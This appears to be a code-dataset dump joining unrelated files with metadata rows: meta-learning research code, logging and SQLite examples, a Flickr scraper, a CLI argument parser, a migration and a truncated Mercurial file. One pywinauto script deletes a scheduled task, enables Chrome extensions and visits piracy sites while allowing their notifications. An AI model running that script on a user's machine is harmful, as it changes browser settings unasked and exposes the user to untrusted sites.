# store grads from the first 50% of clients + proceed normally
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True)  # without this, the graph is freed afterwards and raises an error
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_8_now(learner, fake_grads, loss, error_data, task, label_index, client_index):
# for in fake_grads:
# update_module(learner, updates=updates)
for updates in fake_grads:
update_module(learner, updates=updates)  # apply the fake adaptation first
loss2 = nn.CrossEntropyLoss(reduction='none')
# access per client
error_list = []
for idx, client in enumerate(client_index):
query_data, query_label = error_data[client]
label = label_index[idx]
individual_query_loss = loss2(learner(query_data), query_label)[label]
error_list.append(individual_query_loss)
evaluation_error = torch.mean(torch.stack(error_list))
return evaluation_error
## implemented on 08/12
#############fake adopt 9 (joint lab meeting feedback)
# 50% normal + 50% fake
# first 50% of clients proceed normally
# fake run with the last 50% of clients
# + indexing (support grad / query loss)
# + class sampling without replacement
def fake_adopt_9_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration, split_meta_batch_size):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
if task >= split_meta_batch_size:
# fake run for the last 50% of clients
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True)  # without this, the graph is freed afterwards and raises an error
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
valid_error = torch.tensor([0])
valid_accuracy = torch.tensor([0])
else:
# normal run: first 50% of clients
for step in range(adaptation_steps):
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_9_now(learner, fake_grads, loss, error_data, task, label_index, client_index):
# for in fake_grads:
# update_module(learner, updates=updates)
for updates in fake_grads:
update_module(learner, updates=updates)  # apply the fake adaptation first
loss2 = nn.CrossEntropyLoss(reduction='none')
# access per client
error_list = []
for idx, client in enumerate(client_index):
query_data, query_label = error_data[client]
label = label_index[idx]
individual_query_loss = loss2(learner(query_data), query_label)[label]
error_list.append(individual_query_loss)
evaluation_error = torch.mean(torch.stack(error_list))
return evaluation_error
# fake7: attempt 1
# just write the logic like the previously failed attempts: roughly compute each loss one by one and average them
# expected to fail => honestly, if this works it is the cleanest approach
# huh, this actually runs??
#############fake adopt 10 (lab meeting feedback)
# 50% normal + 50% fake
# first 50% of clients proceed normally
# fake run with the first 50% of clients
def fake_adopt_10_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration, split_meta_batch_size):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
# store grads from the first 50% of clients + proceed normally
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True)  # without this, the graph is freed afterwards and raises an error
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_10_now(learner, fake_grads, loss, error_data, task, label_index, client_index):
# for in fake_grads:
# update_module(learner, updates=updates)
for updates in fake_grads:
update_module(learner, updates=updates)  # apply the fake adaptation first
loss2 = nn.CrossEntropyLoss(reduction='none')
# access per client
error_list = []
for idx, client in enumerate(client_index):
query_data, query_label = error_data[client]
label = label_index[idx]
individual_query_loss = loss2(learner(query_data), query_label)[label]
error_list.append(individual_query_loss)
evaluation_error = torch.mean(torch.stack(error_list))
return evaluation_error
### for validation (compare proper computation against FP 9,10 to pinpoint the problem)
# naturally there are 32 CLIENTs and they are not DISJOINT either.
# however the first 16 proceed normally # the remaining 16 run with the hand-rolled computation.
def fake_adopt_11_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration, split_meta_batch_size):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
if task >= split_meta_batch_size:
# fake run for the last 50% of clients
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True)  # without this, the graph is freed afterwards and raises an error
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
valid_error = torch.tensor([0])
valid_accuracy = torch.tensor([0])
else:
# normal run: first 50% of clients
for step in range(adaptation_steps):
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_11_now(learner, fake_grads, loss, error_data, task, label_index, client_index):
# for in fake_grads:
# update_module(learner, updates=updates)
for updates in fake_grads:
update_module(learner, updates=updates)  # apply the fake adaptation first
loss2 = nn.CrossEntropyLoss(reduction='none')
# access per client
error_list = []
for idx, client in enumerate(client_index):
query_data, query_label = error_data[client]
label = label_index[idx]
individual_query_loss = loss2(learner(query_data), query_label)[label]
error_list.append(individual_query_loss)
evaluation_error = torch.mean(torch.stack(error_list))
return evaluation_error
| 34.855236
| 113
| 0.745353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8,314
| 0.237319
|
c06a8301008200b139bb039c709d82f05d2164d7
| 1,602
|
py
|
Python
|
sigda/test/graylog.py
|
yangluoshen/sigda
|
83a2149d07edfbe56be95d5dc2a316c044bee54e
|
[
"BSD-2-Clause"
] | null | null | null |
sigda/test/graylog.py
|
yangluoshen/sigda
|
83a2149d07edfbe56be95d5dc2a316c044bee54e
|
[
"BSD-2-Clause"
] | 3
|
2017-08-21T07:26:11.000Z
|
2017-11-09T02:19:23.000Z
|
sigda/test/graylog.py
|
yangluoshen/sigda
|
83a2149d07edfbe56be95d5dc2a316c044bee54e
|
[
"BSD-2-Clause"
] | null | null | null |
#coding:utf-8
#from graypy import GELFHandler
import logging.config
import logging
'''
handler = GELFHandler(host='0.0.0.0', port=12201)
logger = logging.getLogger()
logger.addHandler(handler)
logger.error('catch error')
'''
LOG_LEVEL = 'DEBUG'
def get_log_config(category):
log_file = "{}.log".format(category)
return {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'default': {
'format': '%(asctime)s %(levelname)s %(message)s'
},
'console': {
'format': "%(asctime)s [%(thread)d] %(levelname)s %(funcName)s\t%(message)s"
},
},
'handlers': {
'graylog2': {
'level': LOG_LEVEL,
'formatter': 'default',
'class': 'graypy.GELFHandler',
'host': '0.0.0.0',
'port': 12201,
'debugging_fields': False,
'facility': category
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'console'
},
'file': {
'level': 'INFO',
'class': 'logging.FileHandler',
'formatter': 'console',
'filename': log_file
}
},
'root': {
'handlers': ['graylog2', 'file'],
'level': LOG_LEVEL
}
}
LOG_CONFIG = get_log_config('sigda')
logging.config.dictConfig(LOG_CONFIG)
logging.error('catch error again2')
| 23.910448
| 92
| 0.473159
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 726
| 0.453184
|
c06b4470ee6ba272de73e528bcb01060567707f9
| 142
|
py
|
Python
|
instanotifier/fetcher/scripts/fetcher.py
|
chaudbak/instanotifier
|
d29bc6bd9b7a003403886bfff1376b2c1925cc74
|
[
"MIT"
] | null | null | null |
instanotifier/fetcher/scripts/fetcher.py
|
chaudbak/instanotifier
|
d29bc6bd9b7a003403886bfff1376b2c1925cc74
|
[
"MIT"
] | 6
|
2020-06-06T01:27:17.000Z
|
2022-02-10T11:20:17.000Z
|
instanotifier/fetcher/scripts/fetcher.py
|
chaudbak/instanotifier
|
d29bc6bd9b7a003403886bfff1376b2c1925cc74
|
[
"MIT"
] | null | null | null |
from instanotifier.fetcher import tests
def run():
# executed when run with 'manage.py runscript tests'
tests.test_rss_fetcher()
| 20.285714
| 59
| 0.739437
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 55
| 0.387324
|
c06b5a0da650cb5b7106dc53e3294c6abe96376c
| 676
|
py
|
Python
|
clase_4/populate_alumnos.py
|
noctilukkas/python-programming
|
0ced5e1390e5501bae79fd30dd2baefd7bc09040
|
[
"Apache-2.0"
] | null | null | null |
clase_4/populate_alumnos.py
|
noctilukkas/python-programming
|
0ced5e1390e5501bae79fd30dd2baefd7bc09040
|
[
"Apache-2.0"
] | null | null | null |
clase_4/populate_alumnos.py
|
noctilukkas/python-programming
|
0ced5e1390e5501bae79fd30dd2baefd7bc09040
|
[
"Apache-2.0"
] | null | null | null |
import sqlite3
def main():
# establish a connection to the DB and open a cursor
conn = sqlite3.connect("alumnos.db")
cursor = conn.cursor()
# create a tuple of tuples to add records to the table
alumnos = (
(1, "Juan", "Granizado", 8, 25),
(2, "Esteban", "Quito", 2, 19),
(3, "Marina", "Cordoba", 10, 25),
)
for alumno in alumnos:
cursor.execute("INSERT INTO alumnos VALUES (?, ?, ?, ?, ?)", alumno)
# for the records to actually be inserted we have to commit
conn.commit()
print("Datos cargados!")
# close the connection
conn.close()
if __name__ == '__main__':
main()
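# Note: an equivalent, more idiomatic bulk insert would use executemany, e.g.
# cursor.executemany("INSERT INTO alumnos VALUES (?, ?, ?, ?, ?)", alumnos)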
| 22.533333
| 79
| 0.597633
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 334
| 0.494083
|
fbe36d61bbb46c7d89d9f7a7b5921b3928eef150
| 366
|
py
|
Python
|
cap11/main.py
|
felipesch92/livroPython
|
061b1c095c3ec2d25fb1d5fdfbf9e9dbe10b3307
|
[
"MIT"
] | null | null | null |
cap11/main.py
|
felipesch92/livroPython
|
061b1c095c3ec2d25fb1d5fdfbf9e9dbe10b3307
|
[
"MIT"
] | null | null | null |
cap11/main.py
|
felipesch92/livroPython
|
061b1c095c3ec2d25fb1d5fdfbf9e9dbe10b3307
|
[
"MIT"
] | null | null | null |
import sqlite3
con = sqlite3.connect('agenda.db')
cursor = con.cursor()
cursor.execute('''
create table if not exists agenda(
nome text,
telefone text)
''')
cursor.execute('''
insert into agenda(nome, telefone)
values(?, ?)
''', ("Tamara", "51-98175-0510"))
con.commit()
cursor.close()
con.close()
| 22.875
| 42
| 0.562842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 225
| 0.614754
|
fbe380b10e29919d567688beee1e5f00654464f3
| 4,298
|
py
|
Python
|
falconcv/data/scraper/flickr_scraper.py
|
haruiz/FalconCV
|
0c9444451a60c8f6375c30426811160ae79b02ba
|
[
"Apache-2.0"
] | 16
|
2020-06-05T01:26:04.000Z
|
2020-09-18T23:56:14.000Z
|
falconcv/data/scraper/flickr_scraper.py
|
haruiz/FalconCV
|
0c9444451a60c8f6375c30426811160ae79b02ba
|
[
"Apache-2.0"
] | 13
|
2020-06-01T17:35:22.000Z
|
2020-09-22T23:19:27.000Z
|
falconcv/data/scraper/flickr_scraper.py
|
haruiz/FalconCV
|
0c9444451a60c8f6375c30426811160ae79b02ba
|
[
"Apache-2.0"
] | 2
|
2020-06-06T06:10:58.000Z
|
2020-06-08T07:19:24.000Z
|
import logging
import math
import re
import time
import dask
import numpy as np
import requests
import json
import xml.etree.ElementTree as ET
from falconcv.data.scraper.scraper import ImagesScraper
from falconcv.util import ImageUtil
logger = logging.getLogger(__name__)
FLICKR_ENDPOINT = "https://www.flickr.com/services/rest"
# List of sizes:
# url_o: Original (4520 × 3229)
# url_k: Large 2048 (2048 × 1463)
# url_h: Large 1600 (1600 × 1143)
# url_l=: Large 1024 (1024 × 732)
# url_c: Medium 800 (800 × 572)
# url_z: Medium 640 (640 × 457)
# url_m: Medium 500 (500 × 357)
# url_n: Small 320 (320 × 229)
# url_s: Small 240 (240 × 171)
# url_t: Thumbnail (100 × 71)
# url_q: Square 150 (150 × 150)
# url_sq: Square 75 (75 × 75)
class FlickrScraper(ImagesScraper):
def __init__(self, api_key):
super(FlickrScraper, self).__init__()
self.api_key = api_key
def _authenticate(self):
pass
def _get_total_matches(self, q):
total_matches = 0
try:
response = requests.get(url=FLICKR_ENDPOINT, params={
"api_key": self.api_key,
"method": "flickr.photos.search",
"tags": ",".join(q),
"tag_mode": "any",
# "privacy_filter": "1"
"content_type": 1,
"media": "photos",
"per_page": 0,
"format": "json"
})
if response.status_code == 200:
json_text = re.search(r'\((.*?)\)', response.text).group(1)
json_object = json.loads(json_text)
if json_object["stat"] == "ok":
total_matches = int(json_object["photos"]["total"])
# total_matches = json_object["photos"]
except Exception as ex:
logger.error("Error making the request : {}".format(ex))
return total_matches
def _request_photos(self, q, count, page):
images = []
try:
response = requests.get(url=FLICKR_ENDPOINT, params={
"api_key": self.api_key,
"method": "flickr.photos.search",
"tags": ",".join(q),
"tag_mode": "any",
# "privacy_filter": "1"
"content_type": 1,
"media": "photos",
"per_page": count,
"page": page,
"extras": ",".join(["url_o", "url_k", "url_h", "url_l", "url_c", "url_m"])
})
if response.status_code == 200:
try:
# print(response.text)
root: ET.Element = ET.fromstring(response.text)
stat = root.get("stat")
if stat == "ok":
for photo in root.iterfind("photos/photo"):
photo: ET.Element
images.append(photo.attrib)
except Exception as ex:
logger.error("error gathering the response: {}".format(ex))
except Exception as ex:
logger.error("Error making the request : {}".format(ex))
return images
@dask.delayed
def _fetch_image(self, image_info, sz):
try:
if sz in image_info:
url = image_info[sz]
return ImageUtil.url2img(url)
except Exception as ex:
logger.error("Error fetching the image: " % ex)
return None
def fetch(self, q, batch_size: int = 100, timestamp=1, sz="url_m"):
try:
assert batch_size <= 500, "invalid count parameter"
total_matches = self._get_total_matches(q)
logger.debug("{} images found ".format(total_matches))
number_of_pages = math.ceil(total_matches / batch_size)
for page in range(1, number_of_pages):
photos = self._request_photos(q, batch_size, page)
delayed_tasks = list(map(lambda img: self._fetch_image(img, sz), photos))
compute_result = dask.compute(*delayed_tasks)
yield [img for img in compute_result if isinstance(img, np.ndarray)]
time.sleep(timestamp)
except Exception as ex:
logger.error("error fetching the images: {}".format(ex))
| 37.701754
| 90
| 0.543509
| 3,566
| 0.827378
| 829
| 0.192343
| 299
| 0.069374
| 0
| 0
| 1,090
| 0.2529
|
fbe3b3f30ddf6f664ac393236c6cc50652de4531
| 9,893
|
py
|
Python
|
argparser.py
|
geoff-smith/MCplotscripts
|
16dd5fd849671bb082a71f08492676be876209d3
|
[
"MIT"
] | null | null | null |
argparser.py
|
geoff-smith/MCplotscripts
|
16dd5fd849671bb082a71f08492676be876209d3
|
[
"MIT"
] | null | null | null |
argparser.py
|
geoff-smith/MCplotscripts
|
16dd5fd849671bb082a71f08492676be876209d3
|
[
"MIT"
] | null | null | null |
# argParser
# this class generates a RunParams object from the args passed to the script
from runparams import *
import os.path
import string
## handles args passed to the program
#
class ArgParser(object):
def parsePtCutString(self, ptCutString):
return map(float, string.split(ptCutString,',') )
def parseEventsString(self, eventsString):
return map(int, string.split(eventsString,',') )
def displayUserInfo(self):
print ""
print "o------------------o"
print "|Extracthistos Info|"
print "o------------------o"
print ""
print "[example usage]"
print ""
print "extracthistos inputFile.root"
print ""
print "extracthistos inputFile.root /intputDir/*.root --visualize --output outputfile-extracted.root --ptcuts 20,30,50,100 --etacut 2.5 --limit 100"
print ""
print "extracthistos inputFile.root /intputDir/*.root -v -o outputfile-extracted.root -p 20,30,50,100 -e 2.5 -l 100"
print ""
print "[switches]"
print " -d | --debug: Show debug information"
print " -e | --etacut: Set etaCut (double)"
print " -f | --force: Force overwriting of output file"
print " -i | --info: Shows this info"
print " -l | --limit: Limit maximum # of events processed"
print " -o | --output: Set output file (string)"
print " -od | --output-outputdirectory: Set output directory (string)"
print " -p | --ptcuts: Set pTcuts (list of doubles seperated by ',')"
print " -# | --events: Specify events to processed (list of ints seperated by ',')"
print " -m | --multi-processing: create n (int) subprocesses"
print " -% | --modulo: process only every nth event (int)"
print " -%r | --modulo-rest: process only every nth + r event (int)"
print " -v | --visualize: Create visualization(s)"
print " -vs | --visualize-skip-copies: Do not render non-physical particle copies"
print " -vnu | --visualize-no-underlying-event: Do not visualize the underlying event"
print " -vni | --visualize-no-main-interaction: Do not visualize the main interaction"
print " -vsj | --visualize-color-special-jets: Color special particle jets"
print " -vce | --visualize-cutoff-energy: Specify Visualization energy cutoff (double)"
print " -vcs | --visualize-cutoff-special-jets: Cutoff Special Jets"
print " -vcr | --visualize-cutoff-radiation: Cutoff ISR/FSR Jets"
print " -vme | --visualize-mode-energy: Color particles by their energy"
print " -vmp | --visualize-mode-pt: Color particles by their pT"
print " -vr | --visualize-renderer: Specify GraphViz renderer (string), defaults to 'dot'"
print ""
def __init__(self, args):
self.runParams = RunParams()
lenArgs = len(args)
skip = False
forceOutputOverride = False
for i in range (0, lenArgs):
# skip first arg as it's the script's name
if i == 0 or skip:
skip = False
continue
# provide arg and nextArg (if possible)
arg = args[i]
nextArg = None
if (i < lenArgs - 1):
nextArg = args[i+1]
# parse switches
if ( arg == "-d" ) or ( arg == "--debug" ) :
self.runParams.useDebugOutput = True
continue
if ( arg == "-e" ) or ( arg == "--etacut" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.eta = float(nextArg)
skip = True
continue
if ( arg == "-f" ) or ( arg == "--force" ) :
forceOutputOverride = True
continue
if ( arg == "-i" ) or ( arg == "--info" ) :
self.displayUserInfo()
self.runParams.run = False
break
if ( arg == "-l" ) or ( arg == "--limit" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.maxEvents = int(nextArg)
skip = True
continue
if ( arg == "-o" ) or ( arg == "--output" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
                if nextArg[-15:] != '-extracted.root':
raise Exception("'" + arg + "': Output file must end with '-extracted.root'!")
self.runParams.outputFile = nextArg
skip = True
continue
if ( arg == "-p" ) or ( arg == "--ptcuts" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
ptCutString = nextArg
self.runParams.pTCuts = self.parsePtCutString(ptCutString)
skip = True
continue
if ( arg == "-v" ) or ( arg == "--visualize" ) :
self.runParams.useVisualization = True
continue
if ( arg == "-vs" ) or ( arg == "--visualize-skip-copies" ) :
self.runParams.visualizationSkipCopies = True
continue
if ( arg == "-vnu" ) or ( arg == "--visualize-no-underlying-event" ) :
self.runParams.visualizationShowUnderlyingEvent = False
continue
if ( arg == "-vni" ) or ( arg == "--visualize-no-main-interaction" ) :
self.runParams.visualizationShowMainInteraction = False
continue
if ( arg == "-vsj" ) or ( arg == "--visualize-color-special-jets" ) :
self.runParams.visualizationColorSpecialJets = True
continue
if ( arg == "-vme" ) or ( arg == "--visualize-mode-energy" ) :
self.runParams.visualizationEnergyMode = True
continue
if ( arg == "-vmp" ) or ( arg == "--visualize-mode-pt" ) :
self.runParams.visualizationPtMode = True
continue
if ( arg == "-vce" ) or ( arg == "--visualize-cutoff-energy" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.visualizationEnergyCutoff = int(nextArg)
skip = True
continue
if ( arg == "-vcr" ) or ( arg == "--visualize-cutoff-radiation" ) :
self.runParams.visualizationCutoffRadiation = True
continue
if ( arg == "-vcs" ) or ( arg == "--visualize-cutoff-special-jets" ) :
self.runParams.visualizationCutSpecialJets = True
continue
#if ( arg == "-vp" ) or ( arg == "--visualize-pt-cutoff" ) :
#if nextArg is None or nextArg[0] == '-':
#raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
#self.runParams.visualizationPtCutoff = int(nextArg)
#skip = True
#continue
if ( arg == "-vr" ) or ( arg == "--visualize-renderer:" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.visualizationRenderer = nextArg
skip = True
continue
#if ( arg == "-z" ) or ( arg == "--zero-jets" ) :
#self.runParams.zeroAdditionalJets = True
#continue
if ( arg == "-#" ) or ( arg == "--events" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
eventsString = nextArg
self.runParams.events = self.parseEventsString(eventsString)
skip = True
continue
if ( arg == "-od" ) or ( arg == "--output-outputdirectory" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.outputDir = nextArg
skip = True
continue
if ( arg == "-m" ) or ( arg == "--multi-processing" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.multiProcessing = int(nextArg)
skip = True
continue
if ( arg == "-%" ) or ( arg == "--modulo" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.modulo = int(nextArg)
skip = True
continue
if ( arg == "-%r" ) or ( arg == "--modulo-rest" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.moduloRest = int(nextArg)
skip = True
continue
if (arg[0] == '-'):
raise Exception("'" + arg + "' is not a valid switch!")
# deny input files ending with '-extracted.root', as this is our signature for output files:
if arg[-15:] == '-extracted.root':
print "Warning: File '" + arg + "' is being skipped."
continue
# parse input files:
if arg[-5:] == '.root':
thisFile = arg
if thisFile[:7] == "/store/":
if not os.path.isfile(thisFile):
thisFile = "root://xrootd.ba.infn.it/" + thisFile
else:
if not os.path.isfile(thisFile):
raise Exception("File '" + thisFile + "' does not exist!")
self.runParams.inputFileList.append(thisFile)
continue
raise Exception("'" + arg + "' is not a valid root file!")
if self.runParams.useVisualization and len(self.runParams.inputFileList) > 1:
raise Exception("Visualization is allowed only for exactly one input file.")
if self.runParams.run:
if os.path.isfile(self.runParams.outputFile) and not forceOutputOverride:
raise Exception("'" + self.runParams.outputFile + "' exists. Use the --force switch to force overriding.")
            if len(self.runParams.outputDir) != 0:
if not os.path.exists(self.runParams.outputDir):
os.makedirs(self.runParams.outputDir)
self.runParams.outputFilePath = self.runParams.outputDir + "/" + self.runParams.outputFile
else:
self.runParams.outputFilePath = self.runParams.outputFile
#self.displayInfo()
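# --- editor's note: illustrative usage (file names hypothetical; relies on the
# runparams module shipped with this repo) ---
# parser = ArgParser(['extracthistos', 'input.root', '-p', '20,30', '-e', '2.5',
#                     '-o', 'input-extracted.root'])
# if parser.runParams.run:
#     print parser.runParams.inputFileList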
| 39.730924
| 153
| 0.574548
| 9,707
| 0.981199
| 0
| 0
| 0
| 0
| 0
| 0
| 4,143
| 0.418781
|
fbe4f5813f57f07bcd01eac89fa0f4bcc8abfeac
| 1,326
|
py
|
Python
|
floppy/_surf-garbage.py
|
hillscott/windows
|
ba32cd43db1bd1495f0150ab0c32ee63b5a5d415
|
[
"Apache-2.0"
] | null | null | null |
floppy/_surf-garbage.py
|
hillscott/windows
|
ba32cd43db1bd1495f0150ab0c32ee63b5a5d415
|
[
"Apache-2.0"
] | null | null | null |
floppy/_surf-garbage.py
|
hillscott/windows
|
ba32cd43db1bd1495f0150ab0c32ee63b5a5d415
|
[
"Apache-2.0"
] | null | null | null |
# pip install -U pywinauto
from pywinauto.application import Application
import subprocess
import time
subprocess.run('SCHTASKS /DELETE /TN BuildTasks\\Sites /f')
app = Application(backend='uia')
app.start('C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe --force-renderer-accessibility ')
window = app.top_window()
# Allow the registry installed extensions to load...
time.sleep(45)
ch_window = window.child_window(title="Address and search bar", control_type="Edit")
ch_window.type_keys('^a')
ch_window.type_keys('{BACKSPACE}chrome://extensions/{ENTER}')
time.sleep(3)
# Enable Honey (or disable google drive offline)
dlg = window.button6
try:
dlg.click()
except Exception:
dlg.close()
# Enable Soccer wallpapers
dlg = window.button9
try:
dlg.click()
except Exception:
dlg.close()
# Enable Soccer wallpapers (if it exists)
dlg = window.button12
try:
dlg.click()
except Exception:
dlg.close()
time.sleep(5)
ch_window.type_keys('^a')
ch_window.type_keys('{BACKSPACE}https://thepiratebay.org{ENTER}')
time.sleep(10)
# Allow notifications
dlg = window.AllowButton
try:
dlg.wait_not('visible', timeout=2)
dlg.click()
except Exception:
dlg.close()
ch_window.type_keys('^a')
ch_window.type_keys('{BACKSPACE}{BACKSPACE}https://yts.mx{ENTER}')
time.sleep(3)
window.close()
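# --- editor's sketch: the click-or-close pattern repeated above, factored into
# a helper (behaviour-preserving; not part of the original script) ---
def click_or_close(dlg):
    # Best-effort click; if the control is gone or not clickable, close it.
    try:
        dlg.click()
    except Exception:
        dlg.close()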
| 27.625
| 103
| 0.748115
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 557
| 0.42006
|
fbe52989054e585791a8f893935e850e1910b673
| 992
|
py
|
Python
|
sla/migrations/0005_slaprobe_workflow.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | 84
|
2017-10-22T11:01:39.000Z
|
2022-02-27T03:43:48.000Z
|
sla/migrations/0005_slaprobe_workflow.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | 22
|
2017-12-11T07:21:56.000Z
|
2021-09-23T02:53:50.000Z
|
sla/migrations/0005_slaprobe_workflow.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | 23
|
2017-12-06T06:59:52.000Z
|
2022-02-24T00:02:25.000Z
|
# ----------------------------------------------------------------------
# Migrate SLAProbe to workflow
# ----------------------------------------------------------------------
# Copyright (C) 2007-2021 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Third-party modules
from pymongo import UpdateMany
from bson import ObjectId
# NOC modules
from noc.core.migration.base import BaseMigration
class Migration(BaseMigration):
depends_on = [("wf", "0005_slaprobe_default")]
def migrate(self):
coll = self.mongo_db["noc.sla_probes"]
coll.bulk_write(
[
# "Planned"
UpdateMany({}, {"$set": {"state": ObjectId("607a7e1d3d18d4fb3c12032a")}}),
]
)
# Service Profile Workflow
self.mongo_db["noc.sla_profiles"].bulk_write(
[UpdateMany({}, {"$set": {"workflow": ObjectId("607a7dddff3a857a47600b9b")}})]
)
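# --- editor's note: each UpdateMany above is equivalent to the plain call
# coll.update_many({}, {"$set": {...}}); bulk_write is used so that several
# operations can share a single round trip to MongoDB ---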
| 31
| 90
| 0.484879
| 525
| 0.529234
| 0
| 0
| 0
| 0
| 0
| 0
| 525
| 0.529234
|
fbe699dad305df809951dcf85f4ec36f0f78ab23
| 2,640
|
py
|
Python
|
seqpos/lib/python2.7/site-packages/mercurial/dirstateguard.py
|
guanjue/seqpos
|
ab9308ad128547ca968a1d944490710e583703bc
|
[
"MIT"
] | null | null | null |
seqpos/lib/python2.7/site-packages/mercurial/dirstateguard.py
|
guanjue/seqpos
|
ab9308ad128547ca968a1d944490710e583703bc
|
[
"MIT"
] | null | null | null |
seqpos/lib/python2.7/site-packages/mercurial/dirstateguard.py
|
guanjue/seqpos
|
ab9308ad128547ca968a1d944490710e583703bc
|
[
"MIT"
] | null | null | null |
# dirstateguard.py - class to allow restoring dirstate after failure
#
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
from .i18n import _
from . import (
error,
